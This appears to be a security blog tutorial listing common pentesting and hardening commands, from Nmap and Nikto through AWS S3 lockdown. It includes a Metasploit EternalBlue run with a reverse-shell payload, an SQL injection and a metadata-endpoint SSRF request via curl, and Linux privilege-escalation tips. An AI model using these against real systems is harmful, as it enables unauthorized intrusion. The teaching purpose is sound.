Listen to this Post

Introduction:
The line between offensive security and criminal hacking is defined by authorization and intent. Cybersecurity professionals require the same deep technical knowledge as malicious actors to effectively defend digital assets. This article provides a foundational toolkit of essential commands and techniques used in penetration testing, incident response, and system hardening.
Learning Objectives:
- Understand and apply critical commands for network reconnaissance, vulnerability scanning, and system analysis.
- Learn to mitigate common vulnerabilities by understanding their exploitation.
- Develop a practical skillset for both Windows and Linux security environments.
You Should Know:
1. Network Reconnaissance with Nmap
Nmap is the undisputed king of network discovery and security auditing. It is used to discover hosts and services on a computer network by sending packets and analyzing the responses. For defenders, it identifies unauthorized devices and services; for penetration testers, it maps the attack surface.
Command Snippet:
Basic TCP SYN Scan nmap -sS 192.168.1.0/24 Service Version Detection nmap -sV -sC target.com OS Fingerprinting nmap -O 192.168.1.10 Aggressive Scan (noisy but detailed) nmap -A -T4 target_ip
Step-by-step guide:
- Discovery Scan (
nmap -sn 192.168.1.0/24): This sends ICMP echo requests and TCP SYN packets to port 443 to see which hosts are up without port scanning. - Port Scan (
nmap -sS target): The default TCP SYN scan is stealthy as it doesn’t complete the TCP handshake. It identifies open ports. - Service Interrogation (
nmap -sV -sC target): The `-sV` flag probes open ports to determine service/version info, while `-sC` runs a script scan using default NSE (Nmap Scripting Engine) scripts to gather further intelligence.
2. Vulnerability Scanning with Nikto
Nikto is an Open Source web server scanner which performs comprehensive tests against web servers for multiple items, including dangerous files and programs, outdated server software, and version-specific problems.
Command Snippet:
Basic web server scan nikto -h http://www.target.com Scan on a specific port nikto -h http://target.com -p 8080 Output results to a file nikto -h http://target.com -o nikto_scan.html -F html
Step-by-step guide:
- Installation: Nikto is often pre-installed in Kali Linux. Otherwise, it can be installed via package managers (
apt-get install nikto). - Execution: Run a basic scan against the target URL. Nikto will automatically begin testing for over 6700 potentially dangerous files/CGIs, outdated versions, and other issues.
- Analysis: Review the output for critical findings like exposed configuration files, default files with information leaks, and misconfigured settings.
3. Exploiting Vulnerabilities with Metasploit
The Metasploit Framework is a penetration testing platform that enables you to find, exploit, and validate vulnerabilities. It provides the infrastructure, content, and tools to perform security assessments.
Command Snippet:
Start the Metasploit console msfconsole Search for an exploit msf6 > search eternalblue Use an exploit msf6 > use exploit/windows/smb/ms17_010_eternalblue Set required options msf6 exploit(ms17_010_eternalblue) > set RHOSTS 192.168.1.50 msf6 exploit(ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp msf6 exploit(ms17_010_eternalblue) > set LHOST 192.168.1.100 Run the exploit msf6 exploit(ms17_010_eternalblue) > exploit
Step-by-step guide:
1. Initialization: Launch the `msfconsole` interface.
- Module Selection: Use the `search` command to find a relevant exploit module based on the vulnerability identified in previous steps.
- Configuration: Select the module with
use, then configure all required options (like RHOSTS, LHOST, and PAYLOAD). - Execution and Post-Exploitation: Run
exploit. Upon success, you may gain a Meterpreter shell, allowing for further post-exploitation activities on the compromised system.
4. Windows System Hardening with PowerShell
PowerShell is invaluable for both attacking and defending Windows environments. These commands help in auditing and hardening a Windows system.
Command Snippet:
Get a list of all running processes
Get-Process
Check network connections
Get-NetTCPConnection
List all users
Get-LocalUser
Check firewall status and rules
Get-NetFirewallProfile | Format-Table Name, Enabled
Get-NetFirewallRule | Where-Object {$_.Enabled -eq 'True'} | Format-Table Name, DisplayName, Direction, Action
Enable Windows Defender real-time protection
Set-MpPreference -DisableRealtimeMonitoring $false
Step-by-step guide:
- Audit Processes and Connections: Use `Get-Process` and `Get-NetTCPConnection` to identify suspicious applications and network traffic.
- Review User Accounts: `Get-LocalUser` lists all local accounts; look for unauthorized or newly created users.
- Harden the Firewall: Ensure the firewall is enabled for all profiles (Domain, Private, Public) and review active rules to block unnecessary inbound/outbound traffic.
5. Linux Privilege Escalation Techniques
After gaining initial access to a Linux system, attackers often seek to elevate their privileges to root. Understanding these techniques is crucial for defense.
Command Snippet:
Find SUID files (common privilege escalation vector) find / -perm -u=s -type f 2>/dev/null Check for capabilities getcap -r / 2>/dev/null Check crontab for scheduled tasks crontab -l ls -la /etc/cron Check for world-writable files find / -perm -o=w -type f 2>/dev/null Check kernel version for exploits uname -a
Step-by-step guide:
- SUID/GUID Binaries: The `find` command locates binaries with the SUID bit set, which run with the owner’s privileges. Some, like `nmap` (older versions) or
vim, can be leveraged to gain a root shell. - Scheduled Tasks: Inspect `crontab` entries. If a script writable by your current user is run by root, you can edit it to execute malicious code with root privileges.
- Kernel Exploits: The `uname -a` command reveals the kernel version. This can be cross-referenced with public exploits (e.g., Dirty Pipe, Dirty Cow) for potential privilege escalation.
6. API Security Testing with curl
APIs are a critical attack vector. The `curl` command is a simple yet powerful tool for manually testing API endpoints for common vulnerabilities like Broken Object Level Authorization (BOLA).
Command Snippet:
Testing for BOLA by accessing another user's resource
curl -H "Authorization: Bearer YOUR_TOKEN" https://api.example.com/v1/users/123/account
curl -H "Authorization: Bearer YOUR_TOKEN" https://api.example.com/v1/users/456/account
Testing for SQL Injection in a POST request
curl -X POST https://api.example.com/v1/login -d 'username=admin&password=anything' OR '1'='1''
Testing for SSRF
curl -X POST https://api.example.com/v1/fetch -d '{"url":"http://169.254.169.254/latest/meta-data/"}'
Step-by-step guide:
- Identify Endpoints: Use API documentation to find endpoints that access user-specific resources (e.g.,
/users/{id}/account). - Test Authorization: Authenticate as one user (User A with ID 123) and then use the same token to attempt to access the resource of another user (User B with ID 456). A successful request indicates a BOLA vulnerability.
- Test Input Validation: Send crafted inputs in parameters to test for SQLi, Command Injection, or SSRF, observing the API’s response for errors or unexpected behavior.
7. Cloud Infrastructure Hardening (AWS CLI)
Misconfigured cloud storage services like AWS S3 are a leading cause of data breaches. The AWS Command Line Interface is essential for auditing and securing these resources.
Command Snippet:
List all S3 buckets aws s3 ls Check the ACL of a specific bucket aws s3api get-bucket-acl --bucket my-bucket-name Check the bucket policy aws s3api get-bucket-policy --bucket my-bucket-name Block all public access at the bucket level aws s3api put-public-access-block --bucket my-bucket-name --public-access-block-configuration BlockPublicAcls=true,IgnorePublicAcls=true,BlockPublicPolicy=true,RestrictPublicBuckets=true
Step-by-step guide:
- Inventory and Audit: Use `aws s3 ls` to list all buckets. Then, for each bucket, check its Access Control List (ACL) and bucket policy to identify any grants for `http://acs.amazonaws.com/groups/global/AllUsers` (which represents public access).
- Remediate Misconfigurations: If public access is found and not explicitly required, use the `put-public-access-block` command to enforce a strict no-public-access policy. This is a critical step in preventing data leaks from misconfigured S3 buckets.
What Undercode Say:
- The modern defender’s skill set must mirror that of the attacker. Proficiency in these offensive tools is not for malice but for building resilient, tested defenses.
- Security is a continuous process, not a state. Regular auditing, patching, and configuration hardening using these command-line tools are fundamental to maintaining a strong security posture.
The tools and commands detailed here form the bedrock of practical cybersecurity. While powerful individually, their true strength is realized when used in a structured, methodological process—from initial reconnaissance (Nmap) to vulnerability identification (Nikto), exploitation (Metasploit), and post-compromise analysis (Privilege Escalation). For defenders, this knowledge is non-negotiable. It enables proactive threat hunting, robust incident response, and the ability to think like an adversary to anticipate their moves. The command line remains the most precise and powerful interface for this work, cutting through the abstractions of GUI tools to provide direct control and deep visibility into system operations and security controls.
Prediction:
The democratization of hacking tools and knowledge will continue to lower the barrier to entry for cyber threats, making sophisticated attacks more common. Consequently, the demand for technically proficient defenders who can operate at the command-line level will skyrocket. AI will begin to automate the execution of these commands for both attack and defense, leading to an AI-driven arms race in cybersecurity. However, the fundamental principles of reconnaissance, exploitation, and hardening will remain relevant, with human expertise required to interpret context, manage complex campaigns, and make strategic decisions that machines cannot.
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Ouardi Mohamed – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


